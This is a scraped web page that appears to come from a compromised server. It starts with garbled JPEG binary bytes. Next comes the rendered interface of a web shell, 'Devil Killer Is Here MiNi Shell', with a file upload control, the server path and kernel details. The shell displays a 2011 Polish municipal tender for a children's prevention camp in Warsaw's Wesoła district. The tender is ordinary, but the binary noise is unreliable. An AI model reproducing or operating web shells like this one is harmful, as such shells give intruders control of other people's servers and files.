JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110519/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110519/121030-N-2011.html

<p class="kh_header"><b>Warszawa: ZORGANIZOWANIE TURNUSU KOLONI PROFILAKTYCZNYCH Z PROGRAMEM PROFILAKTYCZNYM ORAZ PROGRAMEM SPORTOWO - REKREACYJNYM</b><br>
<b>Numer ogłoszenia: 121030 - 2011; data zamieszczenia: 19.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Stołecznego Warszawy dla Dzielnicy Wesoła , ul. 1 Praskiego Pułku 33, 05-075 Warszawa, woj. mazowieckie, tel. 022 773-60-27, faks 022 773-60-99.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wesola.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZORGANIZOWANIE TURNUSU KOLONI PROFILAKTYCZNYCH Z PROGRAMEM PROFILAKTYCZNYM ORAZ PROGRAMEM SPORTOWO - REKREACYJNYM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie 1. turnusu 14 dniowego kolonii profilaktycznych z programem  profilaktycznym  oraz programem sportowo - rekreacyjnym 
dla 62 dzieci.

Przedmiot zamówienia obejmuje jeden turnus dla 53. dzieci w wieku w wieku 7-12 lat oraz 9. dzieci w wieku 12-15 lat, pochodzących z rodzin dysfunkcyjnych wytypowanych przez Zamawiającego, według zaakceptowanego przez Zamawiającego programu i harmonogramu kolonii oraz programu profilaktycznego i programu sportowo-rekreacyjnego. Zamawiający zastrzega sobie możliwość zmniejszenia liczby dzieci uczestniczących w turnusie - (minimalna liczba dzieci jadących na turnus  to 56 dzieci).
 
Opis zadania:
Zadanie:
1.	Turnus profilaktyczny trwający 14 dni (12 pełnych noclegów), w tym pierwszy i ostatni dzień są dniami przyjazdu i wyjazdu dzieci.
2.	Wyjazd i przyjazd dzieci może obejmować dni wolne od pracy tj. soboty i niedziele.
3.	Wykonawca nie może pobierać żadnych opłat od uczestników kolonii.
Termin:
4.	Termin realizacji zadania:   14 dniowy turnus w przedziale: od  24.06.2011 - do 29.07.2011 roku.
Miejsce:
5.	Miejscem realizacji turnusu muszą być miejscowości na terenie Polski, atrakcyjne pod względem turystycznym z dostępem do zbiornika wodnego (jezioro, zalew, rzeka, morze itp.)z wyznaczonym kąpieliskiem i możliwością kąpania lub położone na obszarach górskich.

Kwalifikacja obiektu:
6.	Obiekt oraz teren, w którym ma być zorganizowany wypoczynek, musi spełniać wymogi określone w Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania ( Dz. U. z 1997 r. Nr 12, poz.67 z późn. zm.) oraz wymogi 
dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno-sanitarnych określonych przepisami o ochronie przeciwpożarowej (Rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 21 kwietnia 2006 r. w sprawie ochrony przeciwpożarowej budynków Dz. U. z 2006 r Nr 80, poz. 536), Państwowej Inspekcji Sanitarnej (ustawa z dnia 14 marca 1985 r. o Państwowej Inspekcji Sanitarnej - Dz. U. z 2006r. Nr 122, poz. 851 z późn. zm.). i ochronie środowiska. Ponadto obiekt  przeznaczony na wypoczynek dzieci i młodzieży musi zgodnie 
z § 45-47 Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, spełniać warunki jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. 
z 2002 r. Nr 75, poz. 690 z późn. zm.)
7.Przed podpisaniem umowy Zamawiający zastrzega sobie prawo do wizji lokalnej
zaproponowanego miejsca realizacji turnusu (obiektu, terenu).

Obiekt i zakwaterowanie:
8.Zamawiający wymaga, by dzieci zakwaterowane zostały w jednym lub dwóch
budynkach murowanych o tym samym standardzie, znajdujących się na terenie ogrodzonym i oświetlonym, stale strzeżonym.
9.Obiekt powinien posiadać własną stołówkę z kuchnią, oddzielną salę umożliwiając
prowadzenie zajęć profilaktycznych dla dzieci wyposażoną w niezbędny sprzęt i meble.
10. Na terenie obiektu powinno znajdować się boisko umożliwiające realizację programsportowo-rekreacyjnego oraz wyposażenie w sprzęt sportowo-rekreacyjny niezbędny dorealizacji zajęć sportowo-rekreacyjnych, a także świetlica wyposażona w niezbędny sprzęt i meble oraz dostępny odbiornik TV.
11.W wyposażeniu obiektu Wykonawca powinien zapewnić także sprawny sprzęt audio-wideo (TV, DVD, audio) materiały do zajęć plastycznych i zajęć prowadzonych przez psychologa  w ilościach zabezpieczających potrzeby wszystkich uczestników oraz organizację imprez i czasu wolnego zgodnie z programem rekreacyjno-sportowym.
12.Zakwaterowanie w pokojach maksymalnie 6 osobowych w obiekcie murowanym takim jak ośrodek wypoczynkowy, dom wczasowy, pensjonat, internat lub samodzielny ośrodek kolonijny; budynkiem murowanym (w rozumieniu przepisów ustawy Prawo budowlane) - z wyłączeniem samodzielnych domków lub pawilonów.
13.Zamawiający wymaga, aby pokoje wyposażone były w: pełnowymiarowe łóżka bez nadstawek   (w pokojach nie mogą znajdować się łóżka piętrowe). Pokoje dzieci powinny być wyposażone w: szafy ubraniowe z wieszakami, stolik i krzesła oraz szafki osobiste przy łóżkach (adekwatnie do ilości osób zakwaterowanych).
14.Węzły sanitarne (natryski, WC, umywalka) w pokojach lub w odrębnym pomieszczeniu na korytarzach ( w bezpośrednim sąsiedztwie pokoi - jedna łazienka przewidziana na nie więcej niż 6 osób).Woda ciepła bez ograniczeń.
15.Wykonawca jest obowiązany zapewnić uczestnikom wypoczynku bezpieczne i higieniczne warunki w czasie wypoczynku - umożliwi dzieciom także korzystanie z pralki oraz suszarni odzieży.
16.Zamawiający wymaga, by dzieci zakwaterowane zostały na tym samym piętrze razem  z wychowawcami.
17.Wykonawca kolonii zapewni możliwość korzystania z kąpieliska spełniającego wymogi bezpieczeństwa i czystości wody (pozytywna opinia Sanepidu) oraz zatrudni ratowników na cały okres turnusu, mających potwierdzone uprawnienia w liczbie dostosowanej do liczby dzieci (w przypadku organizacji wypoczynku nad zbiornikiem wodnym).

Transport:
18.Wykonawca turnusu zapewni transport sprawnym autokarem dla dzieci (do miejsca wypoczynku, powrotu do Warszawy oraz w czasie trwania wypoczynku).
19.Autokary powinny posiadać ważne badania techniczne oraz powinny spełniać warunki  zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 31 grudnia 2002 roku w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. 2003 r. Nr 32, poz. 262 z późn. zm.).
20.Koszt transportu należy wliczyć w cenę jednostkową organizowanego wypoczynku.
21.W przypadku wystąpienia niesprawności podstawionego przez Wykonawcę taboru zobowiązany on jest do zapewnienia na koszt własny zastępczego alternatywnego środkatransportu dla uczestników kolonii o tym samym standardzie, a także do zapewnienia i pokrycia kosztów opieki i wyżywienia dla uczestników kolonii w czasie oczekiwania na transport.
22.Wykonawca zapewni opiekę wychowawców w czasie przewozu uczestników turnusu - na i z turnusu oraz w czasie organizowanych wycieczek stosownie do liczby uczestników.

Ubezpieczenie:
23.Wykonawca turnusu zapewni ubezpieczenie dzieci w czasie transportu i pobytu na turnus (NNW). Koszt ubezpieczenia należy wliczyć w cenę jednostkową organizowanego wypoczynku.
24.Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone przez
uczestników kolonii i jest zobowiązany do posiadania ubezpieczenia O.C.
25.Wykonawca dostarczy przed podpisaniem umowy polisę lub inny dokument potwierdzającyże jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalnościgospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż wartość cenyumowy brutto, obejmującej okres świadczenia usługi.

Wyżywienie:
26.Wyżywienie codzienne - 4 posiłki dziennie (śniadanie, obiad, podwieczorek, kolację)przygotowane zgodnie z zasadami higieny oraz racjonalnego żywienia określonymi w obowiązujących przepisach prawa.
27.Wykonawca turnusu zapewni dzieciom na terenie obiektu - w stołówce, przez cały dzieńdostęp do nieodpłatnych napojów w ilości dostosowanej do zapotrzebowania dzieci.
28.Dodatkowo Wykonawca zapewni dzieciom dostęp do nieodpłatnych napojów w ilościdostosowanej do potrzeb podczas organizowanych w czasie trwania turnusu wycieczek.

Rezydent:
29.Wykonawca przez cały okres turnusu zobowiązuje się do zapewnienia bezpłatnego zakwaterowania i całodziennego wyżywienia dla rezydenta ze strony Zamawiającego
 Zamawiający nie dopuszcza możliwości pełnienia przez rezydenta jednocześnie funkcjiwychowawcy

Kadra:
30.W czasie realizacji kolonii Wykonawca musi dysponować następującymi osobami;
1)  kierownik turnusu,
2)  wychowawcy, w tym także osoby realizujące program sportowo- rekreacyjny,
3)  ratownik - w przypadku gdy turnus organizowany jest w miejscu z dostępem do zbiornika wodnego,
4)  realizator programu profilaktycznego,
5)  pielęgniarka,
6)  psycholog, który może być jednocześnie realizatorem programu profilaktycznego.
Zamawiający nie dopuszcza zmiany kadry, która podjęła pracę z dziećmi bez wcześniejszego uzgodnienia tego faktu z Zamawiającym.

Opieka medyczna:
31. Wykonawca turnusu zapewni dzieciom opiekę medyczną:
- zatrudni pielęgniarkę posiadającą ważne zaświadczenie potwierdzające prawo do wykonywania zawodu (zgodnie z rozporządzeniem Ministra Zdrowia i Opieki Społecznej Dz. U. z 1992 r. Nr 52, poz. 248)   z dyspozycyjnością 24h na dobę w miejscu zakwaterowania dzieci, 
- zapewni stały dostęp do opieki lekarskiej w ramach ubezpieczenia zdrowotnego.
Zamawiający nie dopuszcza możliwości, aby pielęgniarka pełniła jednocześnie funkcjęwychowawcy.
32.Wykonawca zapewni izolatkę dla uczestników kolonii chorujących w trakcie jej trwania oraz poniesie niezbędne koszty ich leczenia nie objęte ubezpieczeniem.
33.Wykonawca zaopatrzy ambulatorium i apteczkę kolonijną w podstawowe leki i środki opatrunkowe, umożliwiające udzielenie w razie konieczności pierwszej pomocy przedlekarskiej, a także zapewni leczenie zgodnie ze wskazaniami lekarskimi w przypadku zachorowań uczestników kolonii.

Program sportowo- rekreacyjny:
34.Celem programu jest przekazanie dzieciom i młodzieży wiedzy na temat aktywnychbezpiecznych i zdrowych form spędzania czasu wolnego w formie atrakcyjnych zabaw, giersportowych, wycieczek rozwijających ich zainteresowania oraz umiejętności współpracy w grupie.
35.Zamawiający wymaga złożenia programu i harmonogramu realizacji zadań dotyczących zajęć sportowo-rekreacyjnych.
Program powinien być realizowany na bezpiecznym terenie.
W przypadku gier terenowych wymagana jest podczas realizacji zajęć obecność wszystkich wychowawców oraz pielęgniarki.
Program sportowo-rekreacyjny powinien obejmować:
- min. 6 godzin w ciągu dnia aktywnych i zorganizowanych form spędzania czasu na świeżym powietrzu oraz w świetlicy: gry i zabawy, zajęcia plastyczne i muzyczne, dyskoteki, turnieje sportowe, zabawy terenowe ,itp.
- organizację minimum 2 całodniowych wycieczek autokarowych do atrakcyjnych poznawczo miejsc/regionów uwzględniających także wstęp do obiektów muzealnych (wraz z opieką wychowawców).

Program profilaktyczny:
36.Program realizowany przez osoby posiadającymi kwalifikacje do prowadzenia programówprofilaktycznych oraz doświadczenie w realizacji w.w. programów. W trakcie trwania spotkańnależy zadbać o poczucie bezpieczeństwa każdego z członków grupy, by miał on możliwośćnabyć   podstawowe   umiejętności   samodzielnego,   niezależnego   oceniania   sytuacji konstruktywnego wyrażania własnych opinii.
Program powinien być tak przygotowany, aby był dostosowany do wieku rozwojowego psychospołecznego uczestników prowadzony w grupach nie większych niż 16 osób.
Program profilaktyczny powinien obejmować od 12 do 16 godzin dydaktycznych zajęć dla każdej z grup w turnusie.
Cele programu profilaktycznego to kształtowanie umiejętności społecznych oraz poznanie mechanizmów uzależnień. Ze szczególnym uwzględnieniem następujących treści:
- umiejętność pracy w grupie:
- rozpoznawanie i wyrażanie własnych  uczuć oraz radzenie sobie z tzw. trudnymi emocjami, tj. napięciem, złością strachem, wstydem itp.;
- budowanie postawy wytrwałości i wytrzymałości;
- doskonalenie umiejętności komunikacji, w tym umiejętności słuchania;
- profilaktyka uzależnień;
37.W realizacji powyższych zadań należy wykorzystać różnorodne formy i metody pracy.
38.Wykonawca zapewnia materiały dydaktyczne niezbędne do realizacji programu
profilaktycznego min. papier, kredki, inne materiały do prowadzenia ćwiczeń.
39. Po zakończeniu turnusu Zamawiający powinien otrzymać, sprawozdanie merytoryczne z realizacji przedmiotu zamówienia wraz z wynikami ankiet ewaluacyjnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>przedłożą aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6. miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy. W przypadku podmiotów występujących wspólnie, dokument ten składają wszyscy Wykonawcy,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>przedłożą wykaz wykonanych wg wzoru określonego w załączniku nr 3 w okresie ostatnich trzech lat przed wszczęciem niniejszego postępowania,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum jednej usługi odpowiadającej swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia tj. zorganizowanie  turnusu kolonii profilaktycznych z programem  profilaktycznym  oraz programem sportowo - rekreacyjnym  o wartości nie mniejszej niż 60.000,- zł (brutto) - z podaniem  wartości, daty wykonania - z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie.  W przypadku podmiotów występujących wspólnie, dokument ten składają Ci Wykonawcy (lub Wykonawca), którzy spełniają warunek udziału w postępowaniu,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>przedłożą wykaz osób wg wzoru określonego w załączniku nr 2, które będą uczestniczyć w wykonywaniu zamówienia. Zamawiający wymaga  dysponowania min:      
- kierownik turnusu (1 osoba) posiadająca doświadczenie w pełnieniu funkcji kierownika turnusu (kolonii) co najmniej 3 krotnie na podobnych turnusach w okresie ostatnich trzech lat oraz posiadającego zaświadczenie o ukończeniu kursu dla kierowników wypoczynku obejmującego program stanowiący załącznik nr 4 do rozporządzenia Min. Edukacji Narodowej    z dnia 21 stycznia1997 r. w sprawie warunków, jakie muszą spełnia organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania nadzorowania (Dz. U. z 1997 r. Nr 12, poz. 67 z późn. zm.).
 - wychowawcy (minimum 6 osób) - Wykonawca zatrudni 1 wychowawcę na nie więcej niż 11 uczestników turnusu. Wychowawcy muszą posiadać minimum średnie wykształcenie oraz doświadczenie w pracy opiekuńczo-wychowawczej lub dydaktyczno wychowawczej - co najmniej 3 krotne uczestnictwo na podobnych turnusach w charakterze wychowawcy w okresie ostatnich trzech lat - zgodnie z rozporządzeniem Min. Edukacji Narodowej z dnia 2 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r. Nr 1S poz. 67 z późn. zm.). Ze względu na profilaktyczny charakter turnusu Zamawiający zaleca, aby wychowawcy posiadali wyższe wykształcenie kierunkowe. 
-pedagoga/psychologa lub instruktora terapii uzależnień (minimum 1 osoba)- osoba ta musi posiadać ukończone studia wyższe kierunkowe oraz posiadać udokumentowane przynajmniej dwuletnie doświadczenie w pracy z dziećmi i młodzieżą oraz doświadczenie z zakresu profilaktyki uzależnień .
- pielęgniarz/pielęgniarka (minimum 1 osoba) - posiadającą ważne zaświadczenie    potwierdzające prawo do wykonywania zawodu - zgodnie z rozporządzeniem Min. Zdrowia i Opieki Społecznej (Dz. U. z 1992 r. Nr 52, poz. 248) z dyspozycyjnością 24h/dobę w sprawowaniu opieki pielęgniarskiej,
- ratownika - (minimum 1 osoba) z potwierdzonymi uprawnienia starszego ratownika wodnego (w przypadku organizacji wypoczynku nad zbiornikiem wodnym).
W przypadku podmiotów występujących wspólnie, dokument ten składają Ci Wykonawcy (lub Wykonawca), którzy spełniają warunek udziału w postępowaniu,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Atrakcyjność terenu, standard ośrodka i baza techniczno-organizacyjna - 25</li>
<li>3 - Program Program zajęć i kadra wychowawcza - 25</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

